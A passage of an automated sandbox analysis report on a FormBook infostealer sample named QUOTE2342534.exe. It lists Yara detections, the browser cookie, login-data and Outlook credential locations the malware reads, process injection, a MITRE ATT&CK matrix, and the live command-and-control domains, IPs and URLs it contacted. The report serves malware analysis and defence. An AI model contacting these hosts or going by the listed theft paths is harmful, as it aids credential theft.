            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541203 Sample: QUOTE2342534.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 37 www.xueerr.xyz 2->37 39 www.voidzero.tech 2->39 41 28 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 57 6 other signatures 2->57 10 QUOTE2342534.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\Users\user\...\QUOTE2342534.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 QUOTE2342534.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 qnPyaKsYTE.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 mshta.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 qnPyaKsYTE.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 rtpsilva4d.click 67.223.117.169, 50035, 50036, 50037 VIMRO-AS15189US United States 29->43 45 www.xueerr.xyz 129.226.176.90, 50027, 50028, 50029 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 29->45 47 11 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            QUOTE2342534.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
            QUOTE2342534.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://schema.org0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://gmpg.org/xfn/110%URL Reputationsafe
            https://schema.org/WPHeader0%URL Reputationsafe
            https://schema.org/WPFooter0%URL Reputationsafe
            https://yoast.com/wordpress/plugins/seo/0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.royapop.online
            		209.74.64.190
            		truetrue
              		unknown
              voidzero.tech
              		84.32.84.32
              		truetrue
                		unknown
                nieuws-july202491.sbs
                		162.0.215.33
                		truetrue
                  		unknown
                  rtpsilva4d.click
                  		67.223.117.169
                  		truetrue
                    		unknown
                    b1-3-r111.kunlundns.top
                    		129.226.56.200
                    		truetrue
                      		unknown
                      www.xueerr.xyz
                      		129.226.176.90
                      		truetrue
                        		unknown
                        coba168.info
                        		118.139.178.37
                        		truetrue
                          		unknown
                          livpure-grab.online
                          		84.32.84.32
                          		truetrue
                            		unknown
                            huwin.club
                            		3.33.130.190
                            		truetrue
                              		unknown
                              everyone.golf
                              		3.33.130.190
                              		truetrue
                                		unknown
                                www.mcse.top
                                		154.9.228.56
                                		truetrue
                                  		unknown
                                  www.putizhong.homes
                                  		154.7.176.67
                                  		truetrue
                                    		unknown
                                    www.onlineblikje.online
                                    		213.249.67.10
                                    		truetrue
                                      		unknown
                                      bandukchi.com
                                      		3.33.130.190
                                      		truetrue
                                        		unknown
                                        b-ambu.com
                                        		84.32.84.32
                                        		truetrue
                                          		unknown
                                          www.coba168.info
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.huwin.club
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.jy58gdwf7t.skin
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.rtpsilva4d.click
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.everyone.golf
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.dxfwrc2h.sbs
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.livpure-grab.online
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.b-ambu.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.bandukchi.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.voidzero.tech
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.nieuws-july202491.sbs
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.bandukchi.com/4nqw/?7Bohe=TM4wmIiUDmnTKniklQ90uhNUhJ9wAlE9nf/Yl9jXXOP3K1JO7ypWLJJbcPRG/mn1E4sifjVCDcv63SEcY+fHR48yBI63+DhGjujcAAYsRe1/gzF87OhGQiowvZSxcJ02Hg==&vD=h0e85vtrue
                                                                  		unknown
                                                                  http://www.huwin.club/cvus/?7Bohe=L6/IgR7jnWgHAqCUWtdTnyQ3KOMoF6iy/gVxl52J0nU+SVs5srMG6NDyylAnxUOxWBqWqLnFW3nZioCT6UqXKC7zbsKc4BTPzCMAY+nXmzAcPovgamuSI2ghdEMnHjenpA==&vD=h0e85vtrue
                                                                    		unknown
                                                                    http://www.huwin.club/cvus/true
                                                                      		unknown
                                                                      http://www.bandukchi.com/4nqw/true
                                                                        		unknown
                                                                        http://www.livpure-grab.online/r966/true
                                                                          		unknown
                                                                          http://www.mcse.top/djad/true
                                                                            		unknown
                                                                            http://www.b-ambu.com/deo6/true
                                                                              		unknown
                                                                              http://www.nieuws-july202491.sbs/4bpc/true
                                                                                		unknown
                                                                                http://www.livpure-grab.online/r966/?vD=h0e85v&7Bohe=St0zOmS57JvxXHngaoKRrYwJhw67SG7V3FAZs2TYvCYNXtW49c+AatXE2ZBTP/KNdGCD9DmtL2naWYac77vyUP4q1YSJ6U5Kf8MwRQ43aJ1o9SgGH2ER+UvSNI1J5J1sVQ==true
                                                                                  		unknown
                                                                                  http://www.coba168.info/o55g/true
                                                                                    		unknown
                                                                                    http://www.xueerr.xyz/vhqd/?7Bohe=WoZBIA9oyl+J2b4VfTP9l9A782ZII/35uSr01551g8NzakXtA+Pa5+JAPkHp6kowgs8acnK71ZwIZDZByVYOuYH08N3N2lAmC4I9AOVCDFEu0aUC6s+F7cMMpoEI61JPvA==&vD=h0e85vtrue
                                                                                      		unknown
                                                                                      http://www.royapop.online/elh0/?7Bohe=pzF/mZhnV0GSmLX+GycMwU6WT06CzqVGvQudBfY4Dqjs/3KtcpfJYGVadgWONk/4osLjzgZwgHUQ0ZwKAvTdTnbY8Qd/xTrHuaQfE1OzRfvOWlfeun0LuB51rXnhStJusg==&vD=h0e85vtrue
                                                                                        		unknown
                                                                                        http://www.xueerr.xyz/vhqd/true
                                                                                          		unknown
                                                                                          http://www.onlineblikje.online/z0t0/?7Bohe=9B/xOqaHJLGzhK9+asydflyTnlILmfDyrXYYsxrw44oQhSljsJ3AUyXQia4yxUul1qSv48mAxItuxzOnZ7dQ4iYj8ngc1biNZhlnUORZPI7XnMKBVwak16kasN63mT84/Q==&vD=h0e85vtrue
                                                                                            		unknown
                                                                                            http://www.voidzero.tech/2vbz/?7Bohe=qlAZWX/ch455H6hDeAWyjxeCoVjeFLImmNyoFLJZcRWWfOSwb/dYbmE5Lo+ESXiDiuCMQOi3bdztXr54sGaKYuw5X5+G7ZC+wzrMILyG35q/IsHjv6ziuhAlYbb1UGsQUw==&vD=h0e85vtrue
                                                                                              		unknown
                                                                                              http://www.dxfwrc2h.sbs/28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85vtrue
                                                                                                		unknown
                                                                                                http://www.onlineblikje.online/z0t0/true
                                                                                                  		unknown
                                                                                                  http://www.mcse.top/djad/?7Bohe=OgBIZAb3K3QVmDSyooTSIAO5Tll+jwwdUI93t9cTrZTAkguQuNIIHt4CXXwiEPUK7V7i0FBLQRxFESBesMpHDzV+LIhV5qbZyNO4rVJKeHZqQ73AKCfxWCZcLIU2txA0ig==&vD=h0e85vtrue
                                                                                                    		unknown
                                                                                                    http://www.putizhong.homes/oacu/?vD=h0e85v&7Bohe=QyeFQ+FiMQKSKdq/BKxG+5Ov1bwmlN3FnlPZyKM2ZYbXsZFvV/O3NTv6ZfeubWU6jSKaxDXQpId5DKUlUVN54eSFHJCOrp//l7em+zpeeu1iGig/Io/KcJQlUpo44DFlsQ==true
                                                                                                      		unknown
                                                                                                      http://www.royapop.online/elh0/true
                                                                                                        		unknown
                                                                                                        http://www.everyone.golf/kb53/true
                                                                                                          		unknown
                                                                                                          http://www.coba168.info/o55g/?7Bohe=SntAYgquUuF8cmTqKgeHt96czNjKbI7walrzfjn5MBbpbz0DMUAQT5TGmaCmCOcjM4ET7TOvVUXTFF/O6lHSx5C+s9iWJ/mgfg63citE2SV2GP/8IEdknZeeY7ynAeJL4g==&vD=h0e85vtrue
                                                                                                            		unknown
                                                                                                            http://www.b-ambu.com/deo6/?7Bohe=NByBCVC4fvk3zNlObrJyagJtuzfI3YQ4Ad7pkV0ATPDcP1/VdlZwhks7LZ4Zlk95UTsGsfg9gVB7u8RemM4hoUvK2Ig2OY9rZRI88AWKe5yd8pSEv6a6wulMHxqZW9lecA==&vD=h0e85vtrue
                                                                                                              		unknown
                                                                                                              http://www.voidzero.tech/2vbz/true
                                                                                                                		unknown
                                                                                                                http://www.putizhong.homes/oacu/true
                                                                                                                  		unknown

                                                                                                                  URLs from Memory and Binaries

                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  https://duckduckgo.com/chrome_newtabmshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://duckduckgo.com/ac/?q=mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://www.coba168.info/%e0%b8%9a%e0%b8%97%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.coba168.info/wp-content/uploads/elementor/css/post-51.css?ver=1728540719mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/DataSet1.xsdQUOTE2342534.exefalse
                                                                                                                        		unknown
                                                                                                                        http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.coba168.info/wp-content/plugins/elementor-pro/assets/css/widget-blockquote.min.css?ver=3.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.23.2mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://line.me/R/ti/p/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://www.coba168.info/wp-content/uploads/2024/10/COBA-168-qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.coba168.info/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://www.coba168.info/#websitemshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://www.coba168.info/sitemap_index.xmlmshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://www.coba168.info/#organizationqnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.24.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTE2342534.exe, 00000000.00000002.2143831590.0000000002B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
